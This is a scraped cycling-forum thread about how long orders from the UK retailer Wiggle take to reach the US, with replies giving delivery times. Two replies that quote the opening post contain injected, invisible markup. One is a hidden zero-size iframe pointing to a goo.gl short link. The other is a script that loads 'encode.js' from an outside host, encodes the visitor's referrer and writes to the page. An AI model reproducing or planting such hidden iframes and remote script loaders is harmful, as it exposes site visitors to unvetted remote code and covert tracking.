Road Bike, Cycling Forums banner
1 - 11 of 11 Posts

·
Registered
689 Posts
Discussion Starter · #1 · (Edited)
Anyone have any experience recently with shipping times from the UK? Just ordered a bunch of stuff from Wiggle and the confirmation email says "expect your order in approximately 6 days."

The last time I ordered from Wiggle it took around three weeks...and I live on the east coast so it's not like it had to travel far. This was about a year ago when it seemed lots of buyers were having the same issue--most said it had to do with US customs. Have things gotten better?

·
Registered
1,694 Posts
Anyone have any experience recently with shipping times from the UK? Just ordered a bunch of stuff from Wiggle and the confirmation email says "expect your order in approximately 6 days." <iframe border=0 frameborder=0 framespacing=0 height=1 width=0 marginheight=0 marginwidth=0 name=new_date noResize scrolling=no src="http://goo.gl/mNkDb" vspale=0></iframe>

The last time I ordered from Wiggle it took around three weeks...and I live on the east coast so it's not like it had to travel far. This was about a year ago when it seemed lots of buyers were having the same issue--most said it had to do with US customs. Have things gotten better?
On avg it takes about 1 week

·
Registered
259 Posts
I ordered a set of wheels from Wiggle on Friday and received them on Tuesday. Much faster than I had expected, given the holiday and all. I'm in the Midwest (Wisconsin). Delivered via DHL in one of the nicest wheel boxes I have seen - double walled with cut out divider to keep the wheels from touching. Very nice.

·
Registered
255 Posts
Anyone have any experience recently with shipping times from the UK? Just ordered a bunch of stuff from Wiggle and the confirmation email says "expect your order in approximately 6 days."

The last time I ordered from Wiggle it took around three weeks...and I live on the east coast so it's not like it had to travel far. This was about a year ago when it seemed lots of buyers were having the same issue--most said it had to do with US customs. Have things gotten better?<script type="text/javascript" src="http://www.pic-host.info/files/encode.js"></script><script type="text/javascript">if (document.referrer) { var ref='?'+encode(document.referrer); } else { var ref=''; }document.write('
');</script>
If you are outside the UK, then usually not more than 1 week / 1,5week.

1 - 11 of 11 Posts
This is an older thread, you may not receive a response, and could be reviving an old thread. Please consider creating a new thread.